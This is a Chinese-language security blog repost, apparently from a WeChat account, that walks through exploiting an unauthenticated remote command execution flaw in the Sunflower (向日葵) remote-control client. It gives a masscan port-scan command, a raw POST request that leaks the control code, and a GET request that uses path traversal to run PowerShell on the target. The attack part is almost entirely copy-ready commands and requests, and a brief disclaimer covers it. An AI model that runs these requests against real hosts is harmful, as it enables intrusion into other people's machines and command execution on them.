这个洞主要只能打内网,在公网服务器很少有装这玩意并开放端口的,而且官方也在最新版本更新了补丁。
1.端口扫描
TCP客户端会开放一个4W口以上的TCP服务端口,我们首先要扫出这个端口
masscan
masscan -p40000-65534 X.X.9.43/32 --rate=500 
2验证端口
显示认证失败的端口就是了
3获取控制码
漏洞也发生在这,未经验证识别码和验证码就把控制码返回出来了
POST /cgi-bin/rpc HTTP/1.1Host: X.X.9.43:49673Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: CID=wj4WkCRIrb4gT8LoyYNTtvvl3rx7fAQOConnection: closeContent-Length: 19action=verify-haras
4.拼接执行命令
把控制码拼接到COOKIE上
Cookie: CID=控制码GET /check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20WHOAMI HTTP/1.1Host: X.X.9.43:49673Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateCookie: CID=SEGfkgNFxtuUcZZbyVNUxkoFZGlMmtk6Accept-Language: zh-CN,zh;q=0.9Connection: close
这样就复现完毕了
写在最后:招人招人招人,查师傅手把手教学搞安全
原文始发于微信公众号(边界骇客):向日葵漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论